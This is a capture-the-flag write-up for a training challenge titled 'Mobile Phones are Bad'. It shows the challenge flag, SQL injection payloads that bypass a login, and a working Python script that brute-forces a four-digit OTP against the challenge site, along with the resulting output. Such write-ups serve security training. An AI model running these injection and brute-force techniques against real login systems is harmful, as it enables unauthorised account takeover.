Hackershala OTP BYPASS : User Profile

# Mobile Phones are Bad **Date:** 04, July, 2021 **Author:** Dhilip Sanjay S *** * The hacker said, Gurugram Interns are intelligent enough to get through this challenge. `https://mudpmd.hackingbrawl.com/` ### Let's brush some database * **Answer:** ctf{youdidit} * **Hint:** Well admin will receive otp of 4 digits. * **Steps to Reproduce:** * Use a basic SQL injection payload to bypass the login. * Error based SQLi * username: `' or '1=1` * password: `' or '1=1` ![OTP](https://2455702228-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGnZnbo7Or7mxxQEpKbLy%2Fuploads%2Fgit-blob-84cd5e7212c7fa7b6e7beaaa8dd7f53eb392a776%2FOTPBypass.png?alt=media) * We have the OTP Verification page - without rate limiting. * We can bruteforce the OTP! ![OTP Verification](https://2455702228-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGnZnbo7Or7mxxQEpKbLy%2Fuploads%2Fgit-blob-09bf3879cc95be40bd5f91183f379f178c1ed289%2FOTPVerification.png?alt=media) * Bruteforcing Python script: ```py #! /usr/bin/python3 import requests url = 'https://mudpmd.hackingbrawl.com/validate_login.php' req = requests.Session() for num in range(1000, 10000): try: print("[+] Guessing ", num) data = { 'code' : num, 'btnValidate' : '' } r = req.post(url, data=data, timeout=5) if "Invalid Authentication Code!" not in r.text: print(r.text) exit(0) except requests.Timeout as err: print("Error occurred") break ``` * The OTP is **7621**: ```html [..snip..] [+] Guessing 7621 Hackershala OTP BYPASS : User Profile

Simple OTP Bypass Simulation

Get Trained at hackershala.com

User Profile

Welcome Hacker

Account Details: ctf{youdidit}

Name: Admin

Username admin

Email [email protected]

Click here to Logout

``` ![OTP Hacked](https://2455702228-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGnZnbo7Or7mxxQEpKbLy%2Fuploads%2Fgit-blob-f3c5ee45b8cd541d0d73d89ce487ef9c19d85b05%2FOTP-Hacked.png?alt=media) ***